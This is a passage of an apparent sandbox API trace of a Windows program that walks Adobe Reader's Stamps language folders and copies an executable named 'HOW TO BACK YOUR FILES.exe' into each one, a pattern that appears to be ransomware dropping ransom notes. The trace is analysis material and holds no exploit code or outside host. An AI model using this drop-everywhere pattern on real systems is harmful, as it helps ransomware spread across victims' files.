FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.140] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.140] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c1afe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c1afe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.141] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.141] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.141] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA" [0059.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3e08 | out: hHeap=0x2b0000) returned 1 [0059.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0059.141] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA") returned 79 [0059.141] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA" [0059.141] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.141] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.147] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.147] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c1afe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c1afe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.148] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN" [0059.148] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3d60 | out: hHeap=0x2b0000) returned 1 [0059.148] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0059.148] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN") returned 79 [0059.148] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN" [0059.148] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.148] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.155] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.155] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806e4d80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c41140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c41140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.155] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.155] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.156] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV" [0059.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3cb8 | out: hHeap=0x2b0000) returned 1 [0059.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0059.156] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV") returned 79 [0059.156] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV" [0059.156] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.156] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.162] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c41140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c41140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.163] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.163] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.163] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA" [0059.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3c10 | out: hHeap=0x2b0000) returned 1 [0059.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0059.163] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA") returned 79 [0059.163] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA" [0059.163] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.163] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.170] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c672a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c672a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.170] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.170] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ" [0059.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb460 | out: hHeap=0x2b0000) returned 1 [0059.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0059.170] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ") returned 79 [0059.170] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ" [0059.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.176] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.177] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81e8c820, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c672a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c672a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.177] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.177] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.177] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP" [0059.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb3b8 | out: hHeap=0x2b0000) returned 1 [0059.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0059.177] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP") returned 79 [0059.177] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP" [0059.177] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.177] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.186] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c672a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c672a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.186] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.186] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.187] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU" [0059.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0059.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0059.187] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU") returned 79 [0059.187] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU" [0059.187] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.187] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.193] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.193] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c8d400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c8d400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.194] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.194] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.194] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU" [0059.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6030 | out: hHeap=0x2b0000) returned 1 [0059.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0059.194] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU") returned 79 [0059.194] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU" [0059.194] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.194] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.201] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.201] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cb3560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cb3560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.201] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.201] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN" [0059.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5f88 | out: hHeap=0x2b0000) returned 1 [0059.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0059.201] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN") returned 79 [0059.201] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN" [0059.201] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.208] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.208] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cb3560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cb3560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.208] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.208] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.208] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE" [0059.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0059.208] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE") returned 79 [0059.208] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE" [0059.208] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.208] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 